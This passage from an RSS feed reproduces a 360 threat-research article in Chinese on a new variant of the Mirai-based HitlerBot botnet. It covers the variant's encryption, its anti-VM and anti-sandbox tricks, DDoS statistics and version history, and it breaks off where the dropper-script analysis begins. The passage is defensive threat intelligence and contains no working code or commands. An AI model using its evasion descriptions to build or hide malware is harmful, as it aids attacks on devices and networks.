Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong><span leaf="">团队介绍</span></strong></span></p></div></div><p style="padding-top: 4px;padding-bottom: 4px;font-size: 12px;letter-spacing: 1.5px;line-height: 1.5em;text-align: center;transform: rotate(0deg);"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">TEAM INTRODUCTION</span></span></p></div><div data-role="paragraph" style="color: rgb(51, 51, 51);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, Arial, sans-serif;"><p style="min-height: 1em;letter-spacing: 0.544px;line-height: 1.5em;font-family: -apple-system-font, BlinkMacSystemFont, Arial, sans-serif;"><span style="color: rgb(190, 25, 31);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong><span style="font-size: 15px;color: rgb(190, 25, 31);"><span leaf="">360</span></span></strong><strong><span style="font-size: 15px;color: rgb(190, 25, 31);"><span leaf="">高级威胁研究院</span></span></strong></span></p><p style="min-height: 1em;letter-spacing: 0.544px;line-height: 1.5em;font-family: -apple-system-font, BlinkMacSystemFont, Arial, sans-serif;"><span style="color: rgb(136, 136, 136);font-size: 14px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">360高级威胁研究院是360政企安全集团的核心能力支持部门，由360资深安全专家组成，专注于高级威胁的发现、防御、处置和研究，曾在全球范围内率先捕获双杀、双星、噩梦公式等多起业界知名的0day在野攻击，独家披露多个国家级APT组织的高级行动，赢得业内外的广泛认可，为360保障国家网络安全提供有力支撑。</span></span></p></div></div></div></div></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>


<p><a href="2247507568">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=08f55618&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzUyMjk4NzExMA%3D%3D%26mid%3D2247507568%26idx%3D1%26sn%3Daf3ec0ff4685722c599eefa26925c842">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Fri, 21 Nov 2025 17:31:00 +0800</pubDate>
    </item>
    <item>
      <title>警惕！HitlerBot僵尸网络最强变种来袭</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzUyMjk4NzExMA==&amp;mid=2247507522&amp;idx=1&amp;sn=7652b4d3d658e731ba5892ff93d13878</link>
      <description>近期，360安全大脑监测发现一种僵尸网络正隐秘发起大规模DDoS攻击，分析其通信协议后确认为HitlerBot僵尸网络新变种。</description>
      <content:encoded><![CDATA[<p>
原创 <span>高级威胁研究院</span> <span>2025-11-17 17:50</span> <span style="display: inline-block;">北京</span>
</p>




<p><img src="https://wechat2rss.xlab.app/img-proxy/?k=d5c21a3b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F6CNEHNicic4Po676j7y3769flsmV9hNJySET3zQlpH98mSg1tDdrbJ92I3arjWLia7uRWphZouRGkauNDicLmkmPZQ%2F0%3Fwx_fmt%3Djpeg"/></p>

<p>近期，360安全大脑监测发现一种僵尸网络正隐秘发起大规模DDoS攻击，分析其通信协议后确认为HitlerBot僵尸网络新变种。</p>

<div data-role="outer" label="edit by 135editor"><div data-role="outer" label="Powered by 135editor.com" data-pm-slice="8 5 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><div data-role="paragraph" style="margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;"><p style="margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="background-color: rgb(190, 25, 31);font-size: 18px;"><strong><span style="background-color: rgb(190, 25, 31);line-height: 43.38px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;color: rgb(255, 255, 255);"><span leaf="">一、概述 </span></span></strong></span></span></p></div><div data-role="paragraph"><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 2em;line-height: 1.6em;"><span style="font-size: 17px;letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">HitlerBot是一种基于Mirai源码开发的僵尸网络变种，因其早期样本中多包含字符串“All hail Hitler!”（意指“希特勒万岁”）以及C2域名包含“集中营”等充满种族主义的单词而得名[1]。近期，360安全大脑监测发现一种僵尸网络正隐秘发起大规模DDoS攻击，分析其通信协议后确认为HitlerBot僵尸网络新变种。目前被该新变种攻击的设备近8000台（35.55%位于中国），为便于安全研究人员快速掌握该新变种特性，制定有针对性的检测防御措施，我们对其加密算法、通信协议、更新点及历史版本特点进行了详细剖析。</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 2em;line-height: 1.6em;"><span style="font-size: 17px;letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">新变种具有如下特点：</span></span></p><ol style="list-style-type: decimal;" class="list-paddingleft-1"><li><p><span leaf="">配置表及通信使用复杂的魔改RC4算法加密保护；</span></p></li><li><p><span leaf="">加密DNS-TXT：加密方式为base64Encode（魔改XXTEA加密(交换C2 IP））；</span></p></li><li><p><span leaf="">强对抗：反虚拟机、反沙箱（必须带运行参数才能运行）、mount挂载绑定方式隐藏bot进程；</span></p></li><li><p><span leaf="">首次使用Handshake域名[2]（基于区块链的分布式DNS，需专用域名服务器进行解析），如：.1、.elite；</span></p></li><li><p><span leaf="">攻击强度更大：监测发现其在2025/10/24 16:44 ~2025/11/8 16:36的11天中，持续对国内某云防护提供商发起了113次DDoS攻击。</span></p></li></ol><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-size: 17px;letter-spacing: 0.578px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><img data-imgfileid="100023840" class="rich_pages wxw-img" data-ratio="0.43815028901734104" data-type="png" data-w="865" src="https://wechat2rss.xlab.app/img-proxy/?k=c857aa93&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Po676j7y3769flsmV9hNJySHt0K3aUf1WWJnG9kqDfyOwJc2sNLQV4UrzhPIljstadl9O498vrJqw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 2em;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-indent: 37.3333px;text-wrap: wrap;"><span leaf="">结合其加密算法复杂程度、对抗强度、攻击强度，堪称HitlerBot最强变种。</span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="background-color: rgb(190, 25, 31);font-size: 18px;"><strong><span style="background-color: rgb(190, 25, 31);line-height: 43.38px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;color: rgb(255, 255, 255);"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;,&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;background-color: rgb(190, 25, 31);font-size: 18px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;strong&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;background-color: rgb(190, 25, 31);line-height: 43.38px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;color: rgb(255, 255, 255);&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"> 二、攻击趋势 </span></span></strong></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 2em;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-indent: 37.3333px;text-wrap: wrap;"><span leaf="">近9天HitlerBot新变种DDoS攻击次数与受害者数量的趋势图如下，2025-11-02日的单日受害者最多，达292个，发起DDoS攻击624次。单日攻击次数最多的2025-11-04日为765次。</span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img data-imgfileid="100023841" class="rich_pages wxw-img" data-ratio="0.4601156069364162" data-type="png" data-w="865" src="https://wechat2rss.xlab.app/img-proxy/?k=ab97563d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Po676j7y3769flsmV9hNJySu5VPodCf6icdm4frybRJwzTQ2DoPW97hVxJuEBm0Zo596TvPKQXEWJQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 2em;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-indent: 37.3333px;text-wrap: wrap;"><span leaf="">下图是HitlerBot新变种全球攻击数据图，累计攻击设备7258台，其中位于中国的设备遭受攻击最多，为2580台（占比35.55%），美国（1384台，占比19.07%），巴西（1280台，占比17.64%）。</span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img data-imgfileid="100023842" class="rich_pages wxw-img" data-ratio="0.5445086705202312" data-type="png" data-w="865" src="https://wechat2rss.xlab.app/img-proxy/?k=eaca4a30&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Po676j7y3769flsmV9hNJySfVmUhR0PI29hic6psPmj9AZtyqkdYmOYz1Yt01WnzDEjLJyGQVAPFuQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 2em;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;" data-pm-slice="3 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;text-indent: 2em;line-height: 1.6em;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span style="font-size: 17px;letter-spacing: 0.578px;text-indent: 37.3333px;"><span leaf="">具体到国内，台湾（321，占比12.44%）、浙江（305，占比11.82%）、江苏（135，占比5.23%）、山东（90，占比3.49%）四省遭受HitlerBot新变种攻击的用户最多，占国内被攻击用户的33%。</span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-size: 17px;letter-spacing: 0.578px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><img data-imgfileid="100023843" class="rich_pages wxw-img" data-ratio="0.6265895953757226" data-type="png" data-w="865" src="https://wechat2rss.xlab.app/img-proxy/?k=866fc34c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Po676j7y3769flsmV9hNJyStNk2AjNSsjy8M5T8v1UBibYfwTpvl9ickwIvDQlyj1ssUXdLcfuyKwEA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;,&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span style="background-color: rgb(190, 25, 31);font-size: 18px;"><strong><span style="background-color: rgb(190, 25, 31);line-height: 43.38px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;color: rgb(255, 255, 255);"><span leaf=""> 三、版本迭代 </span></span></strong></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-size: 17px;letter-spacing: 0.578px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><img data-imgfileid="100023844" class="rich_pages wxw-img" data-ratio="0.4115606936416185" data-type="png" data-w="865" src="https://wechat2rss.xlab.app/img-proxy/?k=e006c6d0&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Po676j7y3769flsmV9hNJySbYYLuMICgSEVCoRr4tZ2V57DicbuoZf3kKfhOblxLnQgAg4EuH2ibnJw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><p style="text-align: center;"><span leaf=""><span textstyle="" style="font-size: 14px;font-weight: bold;">HitlerBot僵尸网络历史版本迭代</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 2em;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-indent: 37.3333px;text-wrap: wrap;"><span leaf="">结合其历史版本迭代分析，HitlerBot僵尸网络主要有以下特点：</span></span></span></p><ol style="list-style-type: decimal;" class="list-paddingleft-1"><li><p><span leaf="">早期变种可追溯到2024.08月；</span></p></li><li><p><span leaf="">更新较快：3~6个月便有一次重要更新；</span></p></li><li><p><span leaf="">功能不断强化：对抗手段更丰富、隐蔽性更强（加密方式多样化、复杂化）。</span></p></li></ol><p style="margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;,&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span style="background-color: rgb(190, 25, 31);font-size: 18px;"><strong><span style="background-color: rgb(190, 25, 31);line-height: 43.38px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;color: rgb(255, 255, 255);"><span leaf=""> 四、攻击活动分析  </span></span></strong></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 2em;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-indent: 37.3333px;text-wrap: wrap;"><span leaf="">HitlerBot主要通过暴力破解、漏洞利用等方式进行传播，在被披露后的1年多时间内[1]，HitlerBot陆续更新了多个版本、新增多个不同功能，下文将逐一分析。</span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;line-height: 1.6em;text-indent: 0em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong style="color: rgb(190, 25, 31);font-size: var(--articleFontsize);letter-spacing: 0.034em;"><span style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;line-height: 1.6em;text-indent: 0em;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;strong&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;color: rgb(190, 25, 31);font-size: var(--articleFontsize);letter-spacing: 0.034em;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">4.1. 下发恶意脚本</span></span></strong></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">HitlerBot入侵成功后，会运行恶意脚本以植入HitlerBot僵尸程序（覆盖arm、x86_64、mips等主流架构）。本文先对其x64新变种39c820dac2b7817c82a29fa8307c1cf6进行分析。</span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 0px;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><img class="rich_pages wxw-img" data-imgfileid="100023845" data-ratio="0.40809248554913297" data-w="865" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=cb05d5b4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Po676j7y3769flsmV9hNJySCPKEDM9Xv8l0owf03MXiaKuMcSjxsM80bXWjMOEOoJv4ibqMO3tT9Aiag%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;line-height: 1.6em;text-indent: 0em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong style="color: rgb(190, 25, 31);font-size: var(--articleFontsize);letter-spacing: 0.034em;"><span style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;line-height: 1.6em;text-indent: 